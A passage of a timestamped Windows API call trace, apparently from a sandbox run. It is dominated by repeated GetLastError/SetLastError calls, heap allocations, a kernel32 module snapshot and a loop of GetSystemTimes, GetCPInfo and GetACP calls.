(dwErrCode=0x0) [0079.857] GetLastError () returned 0x0 [0079.857] SetLastError (dwErrCode=0x0) [0079.857] GetLastError () returned 0x0 [0079.857] SetLastError (dwErrCode=0x0) [0079.858] GetLastError () returned 0x0 [0079.858] SetLastError (dwErrCode=0x0) [0079.858] GetLastError () returned 0x0 [0079.858] SetLastError (dwErrCode=0x0) [0079.858] GetLastError () returned 0x0 [0079.858] SetLastError (dwErrCode=0x0) [0079.858] GetLastError () returned 0x0 [0079.858] SetLastError (dwErrCode=0x0) [0079.858] GetLastError () returned 0x0 [0079.858] SetLastError (dwErrCode=0x0) [0079.858] GetLastError () returned 0x0 [0079.858] SetLastError (dwErrCode=0x0) [0079.858] GetLastError () returned 0x0 [0079.858] SetLastError (dwErrCode=0x0) [0079.858] GetLastError () returned 0x0 [0079.859] SetLastError (dwErrCode=0x0) [0079.859] GetLastError () returned 0x0 [0079.859] SetLastError (dwErrCode=0x0) [0079.859] GetLastError () returned 0x0 [0079.859] SetLastError (dwErrCode=0x0) [0079.859] GetLastError () returned 0x0 [0079.859] SetLastError (dwErrCode=0x0) [0079.859] GetLastError () returned 0x0 [0079.859] SetLastError (dwErrCode=0x0) [0079.859] GetLastError () returned 0x0 [0079.859] SetLastError (dwErrCode=0x0) [0079.859] GetLastError () returned 0x0 [0079.859] SetLastError (dwErrCode=0x0) [0079.859] GetLastError () returned 0x0 [0079.859] SetLastError (dwErrCode=0x0) [0079.859] GetLastError () returned 0x0 [0079.859] SetLastError (dwErrCode=0x0) [0079.860] GetLastError () returned 0x0 [0079.860] SetLastError (dwErrCode=0x0) [0079.860] GetLastError () returned 0x0 [0079.860] SetLastError (dwErrCode=0x0) [0079.860] GetLastError () returned 0x0 [0079.860] SetLastError (dwErrCode=0x0) [0079.860] GetLastError () returned 0x0 [0079.860] SetLastError (dwErrCode=0x0) [0079.860] GetLastError () returned 0x0 [0079.860] SetLastError (dwErrCode=0x0) [0079.860] GetLastError () returned 0x0 [0079.860] SetLastError (dwErrCode=0x0) [0079.860] GetLastError () returned 0x0 [0079.860] SetLastError (dwErrCode=0x0) [0079.860] GetLastError () returned 0x0 [0079.861] SetLastError (dwErrCode=0x0) [0079.861] GetLastError () returned 0x0 [0079.861] SetLastError (dwErrCode=0x0) [0079.861] GetLastError () returned 0x0 [0079.861] SetLastError (dwErrCode=0x0) [0079.861] GetLastError () returned 0x0 [0079.861] SetLastError (dwErrCode=0x0) [0079.861] GetLastError () returned 0x0 [0079.861] SetLastError (dwErrCode=0x0) [0079.861] GetLastError () returned 0x0 [0079.861] SetLastError (dwErrCode=0x0) [0079.861] GetLastError () returned 0x0 [0079.861] SetLastError (dwErrCode=0x0) [0079.861] GetLastError () returned 0x0 [0079.861] SetLastError (dwErrCode=0x0) [0079.861] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x68) returned 0x1f51990 [0079.861] GetLastError () returned 0x0 [0079.862] SetLastError (dwErrCode=0x0) [0079.862] GetLastError () returned 0x0 [0079.862] SetLastError (dwErrCode=0x0) [0079.862] GetLastError () returned 0x0 [0079.862] SetLastError (dwErrCode=0x0) [0079.862] GetLastError () returned 0x0 [0079.862] SetLastError (dwErrCode=0x0) [0079.862] GetLastError () returned 0x0 [0079.862] SetLastError (dwErrCode=0x0) [0079.862] GetLastError () returned 0x0 [0079.862] SetLastError (dwErrCode=0x0) [0079.862] GetLastError () returned 0x0 [0079.862] SetLastError (dwErrCode=0x0) [0079.862] GetLastError () returned 0x0 [0079.862] SetLastError (dwErrCode=0x0) [0079.862] GetLastError () returned 0x0 [0079.862] SetLastError (dwErrCode=0x0) [0079.863] GetLastError () returned 0x0 [0079.863] SetLastError (dwErrCode=0x0) [0079.863] GetLastError () returned 0x0 [0079.863] SetLastError (dwErrCode=0x0) [0079.863] GetLastError () returned 0x0 [0079.863] SetLastError (dwErrCode=0x0) [0079.863] GetLastError () returned 0x0 [0079.863] SetLastError (dwErrCode=0x0) [0079.863] GetLastError () returned 0x0 [0079.863] SetLastError (dwErrCode=0x0) [0079.863] GetLastError () returned 0x0 [0079.863] SetLastError (dwErrCode=0x0) [0079.863] GetLastError () returned 0x0 [0079.863] SetLastError (dwErrCode=0x0) [0079.863] GetLastError () returned 0x0 [0079.863] SetLastError (dwErrCode=0x0) [0079.863] GetLastError () returned 0x0 [0079.863] SetLastError (dwErrCode=0x0) [0079.864] GetLastError () returned 0x0 [0079.864] SetLastError (dwErrCode=0x0) [0079.864] GetLastError () returned 0x0 [0079.864] SetLastError (dwErrCode=0x0) [0079.864] GetLastError () returned 0x0 [0079.864] SetLastError (dwErrCode=0x0) [0079.864] GetLastError () returned 0x0 [0079.864] SetLastError (dwErrCode=0x0) [0079.864] GetLastError () returned 0x0 [0079.866] SetLastError (dwErrCode=0x0) [0079.866] GetLastError () returned 0x0 [0079.866] SetLastError (dwErrCode=0x0) [0079.866] GetLastError () returned 0x0 [0079.866] SetLastError (dwErrCode=0x0) [0079.866] GetLastError () returned 0x0 [0079.866] SetLastError (dwErrCode=0x0) [0079.866] GetLastError () returned 0x0 [0079.866] SetLastError (dwErrCode=0x0) [0079.866] GetLastError () returned 0x0 [0079.867] SetLastError (dwErrCode=0x0) [0079.867] GetLastError () returned 0x0 [0079.867] SetLastError (dwErrCode=0x0) [0079.867] GetLastError () returned 0x0 [0079.867] SetLastError (dwErrCode=0x0) [0079.867] GetLastError () returned 0x0 [0079.867] SetLastError (dwErrCode=0x0) [0079.867] GetLastError () returned 0x0 [0079.867] SetLastError (dwErrCode=0x0) [0079.867] GetLastError () returned 0x0 [0079.867] SetLastError (dwErrCode=0x0) [0079.867] GetLastError () returned 0x0 [0079.867] SetLastError (dwErrCode=0x0) [0079.867] GetLastError () returned 0x0 [0079.867] SetLastError (dwErrCode=0x0) [0079.867] GetLastError () returned 0x0 [0079.867] SetLastError (dwErrCode=0x0) [0079.867] GetLastError () returned 0x0 [0079.867] SetLastError (dwErrCode=0x0) [0079.867] GetLastError () returned 0x0 [0079.868] SetLastError (dwErrCode=0x0) [0079.868] GetLastError () returned 0x0 [0079.868] SetLastError (dwErrCode=0x0) [0079.868] GetLastError () returned 0x0 [0079.868] SetLastError (dwErrCode=0x0) [0079.868] GetLastError () returned 0x0 [0079.868] SetLastError (dwErrCode=0x0) [0079.868] GetLastError () returned 0x0 [0079.868] SetLastError (dwErrCode=0x0) [0079.868] GetLastError () returned 0x0 [0079.868] SetLastError (dwErrCode=0x0) [0079.868] GetLastError () returned 0x0 [0079.868] SetLastError (dwErrCode=0x0) [0079.868] GetLastError () returned 0x0 [0079.868] SetLastError (dwErrCode=0x0) [0079.868] GetLastError () returned 0x0 [0079.868] SetLastError (dwErrCode=0x0) [0079.868] GetLastError () returned 0x0 [0079.868] SetLastError (dwErrCode=0x0) [0079.868] GetLastError () returned 0x0 [0079.868] SetLastError (dwErrCode=0x0) [0079.868] GetLastError () returned 0x0 [0079.869] SetLastError (dwErrCode=0x0) [0079.869] GetLastError () returned 0x0 [0079.869] SetLastError (dwErrCode=0x0) [0079.869] GetLastError () returned 0x0 [0079.869] SetLastError (dwErrCode=0x0) [0079.869] GetLastError () returned 0x0 [0079.869] SetLastError (dwErrCode=0x0) [0079.869] GetLastError () returned 0x0 [0079.869] SetLastError (dwErrCode=0x0) [0079.869] GetLastError () returned 0x0 [0079.869] SetLastError (dwErrCode=0x0) [0079.869] GetLastError () returned 0x0 [0079.869] SetLastError (dwErrCode=0x0) [0079.869] GetLastError () returned 0x0 [0079.869] SetLastError (dwErrCode=0x0) [0079.869] GetLastError () returned 0x0 [0079.869] SetLastError (dwErrCode=0x0) [0079.869] GetLastError () returned 0x0 [0079.869] SetLastError (dwErrCode=0x0) [0079.869] GetLastError () returned 0x0 [0079.869] SetLastError (dwErrCode=0x0) [0079.869] GetLastError () returned 0x0 [0079.870] SetLastError (dwErrCode=0x0) [0079.870] GetLastError () returned 0x0 [0079.870] SetLastError (dwErrCode=0x0) [0079.870] GetLastError () returned 0x0 [0079.870] SetLastError (dwErrCode=0x0) [0079.870] GetLastError () returned 0x0 [0079.870] SetLastError (dwErrCode=0x0) [0079.870] GetLastError () returned 0x0 [0079.870] SetLastError (dwErrCode=0x0) [0079.870] GetLastError () returned 0x0 [0079.870] SetLastError (dwErrCode=0x0) [0079.870] GetLastError () returned 0x0 [0079.870] SetLastError (dwErrCode=0x0) [0079.870] GetLastError () returned 0x0 [0079.870] SetLastError (dwErrCode=0x0) [0079.870] GetLastError () returned 0x0 [0079.870] SetLastError (dwErrCode=0x0) [0079.870] GetLastError () returned 0x0 [0079.870] SetLastError (dwErrCode=0x0) [0079.870] GetLastError () returned 0x0 [0079.871] SetLastError (dwErrCode=0x0) [0079.871] GetLastError () returned 0x0 [0079.871] SetLastError (dwErrCode=0x0) [0079.871] GetLastError () returned 0x0 [0079.871] SetLastError (dwErrCode=0x0) [0079.871] GetLastError () returned 0x0 [0079.871] SetLastError (dwErrCode=0x0) [0079.871] GetLastError () returned 0x0 [0079.871] SetLastError (dwErrCode=0x0) [0079.871] GetLastError () returned 0x0 [0079.871] SetLastError (dwErrCode=0x0) [0079.871] GetLastError () returned 0x0 [0079.871] SetLastError (dwErrCode=0x0) [0079.871] GetLastError () returned 0x0 [0079.871] SetLastError (dwErrCode=0x0) [0079.871] GetLastError () returned 0x0 [0079.871] SetLastError (dwErrCode=0x0) [0079.871] GetLastError () returned 0x0 [0079.871] SetLastError (dwErrCode=0x0) [0079.871] GetLastError () returned 0x0 [0079.871] SetLastError (dwErrCode=0x0) [0079.871] GetLastError () returned 0x0 [0079.872] SetLastError (dwErrCode=0x0) [0079.872] GetLastError () returned 0x0 [0079.872] SetLastError (dwErrCode=0x0) [0079.872] GetLastError () returned 0x0 [0079.872] SetLastError (dwErrCode=0x0) [0079.872] GetLastError () returned 0x0 [0079.872] SetLastError (dwErrCode=0x0) [0079.872] GetLastError () returned 0x0 [0079.872] SetLastError (dwErrCode=0x0) [0079.872] GetLastError () returned 0x0 [0079.872] SetLastError (dwErrCode=0x0) [0079.872] GetLastError () returned 0x0 [0079.872] SetLastError (dwErrCode=0x0) [0079.872] GetLastError () returned 0x0 [0079.872] SetLastError (dwErrCode=0x0) [0079.872] GetLastError () returned 0x0 [0079.872] SetLastError (dwErrCode=0x0) [0079.872] GetLastError () returned 0x0 [0079.872] SetLastError (dwErrCode=0x0) [0079.872] GetLastError () returned 0x0 [0079.872] SetLastError (dwErrCode=0x0) [0079.872] GetLastError () returned 0x0 [0079.873] SetLastError (dwErrCode=0x0) [0079.873] GetLastError () returned 0x0 [0079.873] SetLastError (dwErrCode=0x0) [0079.873] GetLastError () returned 0x0 [0079.873] SetLastError (dwErrCode=0x0) [0079.873] GetLastError () returned 0x0 [0079.873] SetLastError (dwErrCode=0x0) [0079.873] GetLastError () returned 0x0 [0079.873] SetLastError (dwErrCode=0x0) [0079.873] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x98) returned 0x1f51a00 [0079.873] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x1f) returned 0x1f51aa0 [0079.873] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x36) returned 0x1f51ac8 [0079.873] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x37) returned 0x1f51b08 [0079.873] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x3c) returned 0x1f51b48 [0079.873] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x31) returned 0x1f51b90 [0079.873] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x17) returned 0x1f51bd0 [0079.873] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x24) returned 0x1f51bf0 [0079.873] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x14) returned 0x1f51c20 [0079.873] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0xd) returned 0x1f51c40 [0079.873] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x25) returned 0x1f51c58 [0079.873] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x39) returned 0x1f51c88 [0079.873] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x18) returned 0x1f51cd0 [0079.873] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x17) returned 0x1f51cf0 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0xe) returned 0x1f51d10 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x69) returned 0x1f51d28 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x3e) returned 0x1f51da0 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x1b) returned 0x1f51de8 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x1d) returned 0x1f51e10 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x48) returned 0x1f51e38 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x12) returned 0x1f51e88 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x18) returned 0x1f51ea8 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x1b) returned 0x1f51ec8 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x24) returned 0x1f51ef0 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x29) returned 0x1f51f20 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x1e) returned 0x1f51f58 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x41) returned 0x1f51f80 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x17) returned 0x1f51fd0 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0xf) returned 0x1f51ff0 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x16) returned 0x1f52008 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x2a) returned 0x1f52028 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x29) returned 0x1f52060 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x15) returned 0x1f52098 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x1e) returned 0x1f520b8 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x2a) returned 0x1f520e0 [0079.874] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x12) returned 0x1f52118 [0079.875] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x18) returned 0x1f52138 [0079.875] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x46) returned 0x1f52158 [0079.875] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f511f8 | out: hHeap=0x1f50000) returned 1 [0079.876] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x800) returned 0x1f521a8 [0079.876] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x80) returned 0x1f511f8 [0079.876] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e49) returned 0x0 [0079.876] RtlSizeHeap (HeapHandle=0x1f50000, Flags=0x0, MemoryPointer=0x1f511f8) returned 0x80 [0079.877] GetLastError () returned 0x0 [0079.877] SetLastError (dwErrCode=0x0) [0079.877] GetLastError () returned 0x0 [0079.877] SetLastError (dwErrCode=0x0) [0079.877] GetLastError () returned 0x0 [0079.877] SetLastError (dwErrCode=0x0) [0079.877] GetLastError () returned 0x0 [0079.877] SetLastError (dwErrCode=0x0) [0079.877] GetLastError () returned 0x0 [0079.877] SetLastError (dwErrCode=0x0) [0079.877] GetLastError () returned 0x0 [0079.877] SetLastError (dwErrCode=0x0) [0079.877] GetLastError () returned 0x0 [0079.877] SetLastError (dwErrCode=0x0) [0079.877] GetLastError () returned 0x0 [0079.877] SetLastError (dwErrCode=0x0) [0079.877] GetLastError () returned 0x0 [0079.877] SetLastError (dwErrCode=0x0) [0079.877] GetLastError () returned 0x0 [0079.877] SetLastError (dwErrCode=0x0) [0079.877] GetLastError () returned 0x0 [0079.878] SetLastError (dwErrCode=0x0) [0079.878] GetLastError () returned 0x0 [0079.878] SetLastError (dwErrCode=0x0) [0079.878] GetLastError () returned 0x0 [0079.878] SetLastError (dwErrCode=0x0) [0079.878] GetLastError () returned 0x0 [0079.878] SetLastError (dwErrCode=0x0) [0079.878] GetLastError () returned 0x0 [0079.878] SetLastError (dwErrCode=0x0) [0079.878] GetLastError () returned 0x0 [0079.878] SetLastError (dwErrCode=0x0) [0079.878] GetLastError () returned 0x0 [0079.878] SetLastError (dwErrCode=0x0) [0079.878] GetLastError () returned 0x0 [0079.878] SetLastError (dwErrCode=0x0) [0079.878] GetLastError () returned 0x0 [0079.878] SetLastError (dwErrCode=0x0) [0079.878] GetLastError () returned 0x0 [0079.878] SetLastError (dwErrCode=0x0) [0079.878] GetLastError () returned 0x0 [0079.878] SetLastError (dwErrCode=0x0) [0079.879] GetLastError () returned 0x0 [0079.879] SetLastError (dwErrCode=0x0) [0079.879] GetLastError () returned 0x0 [0079.879] SetLastError (dwErrCode=0x0) [0079.879] GetLastError () returned 0x0 [0079.879] SetLastError (dwErrCode=0x0) [0079.879] GetLastError () returned 0x0 [0079.879] SetLastError (dwErrCode=0x0) [0079.879] GetLastError () returned 0x0 [0079.879] SetLastError (dwErrCode=0x0) [0079.879] GetLastError () returned 0x0 [0079.879] SetLastError (dwErrCode=0x0) [0079.879] GetLastError () returned 0x0 [0079.879] SetLastError (dwErrCode=0x0) [0079.879] GetLastError () returned 0x0 [0079.879] SetLastError (dwErrCode=0x0) [0079.879] GetLastError () returned 0x0 [0079.879] SetLastError (dwErrCode=0x0) [0079.879] GetLastError () returned 0x0 [0079.879] SetLastError (dwErrCode=0x0) [0079.879] GetLastError () returned 0x0 [0079.879] SetLastError (dwErrCode=0x0) [0079.879] GetLastError () returned 0x0 [0079.880] SetLastError (dwErrCode=0x0) [0079.880] GetLastError () returned 0x0 [0079.880] SetLastError (dwErrCode=0x0) [0079.880] GetLastError () returned 0x0 [0079.880] SetLastError (dwErrCode=0x0) [0079.880] GetLastError () returned 0x0 [0079.881] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0079.881] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0079.881] GetProcAddress (hModule=0x76e10000, lpProcName="Module32FirstW") returned 0x76e479f9 [0079.881] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0079.883] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0079.883] PeekMessageA (in: lpMsg=0x18fa44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa44) returned 0 [0079.884] GetTickCount () returned 0x1159c50 [0079.884] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.884] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.884] GetACP () returned 0x4e4 [0079.884] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.884] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.884] GetACP () returned 0x4e4 [0079.884] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.884] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.884] GetACP () returned 0x4e4 [0079.884] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.884] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.884] GetACP () returned 0x4e4 [0079.884] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.884] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.884] GetACP () returned 0x4e4 [0079.884] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.884] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.884] GetACP () returned 0x4e4 [0079.884] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.884] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.884] GetACP () returned 0x4e4 [0079.885] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.885] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.885] GetACP () returned 0x4e4 [0079.885] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.885] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.885] GetACP () returned 0x4e4 [0079.885] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.885] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.885] GetACP () returned 0x4e4 [0079.885] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.885] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.885] GetACP () returned 0x4e4 [0079.885] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.885] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.885] GetACP () returned 0x4e4 [0079.885] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.885] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.885] GetACP () returned 0x4e4 [0079.885] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.885] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.885] GetACP () returned 0x4e4 [0079.885] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.885] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.885] GetACP () returned 0x4e4 [0079.886] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.886] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.886] GetACP () returned 0x4e4 [0079.886] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.886] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.886] GetACP () returned 0x4e4 [0079.886] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.886] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.886] GetACP () returned 0x4e4 [0079.886] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.886] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.886] GetACP () returned 0x4e4 [0079.886] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.886] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.886] GetACP () returned 0x4e4 [0079.886] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.886] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.886] GetACP () returned 0x4e4 [0079.886] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.886] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.886] GetACP () returned 0x4e4 [0079.886] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.886] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.886] GetACP () returned 0x4e4 [0079.886] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.887] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.887] GetACP () returned 0x4e4 [0079.887] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.887] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.887] GetACP () returned 0x4e4 [0079.887] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.887] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.887] GetACP () returned 0x4e4 [0079.887] GetSystemTimes 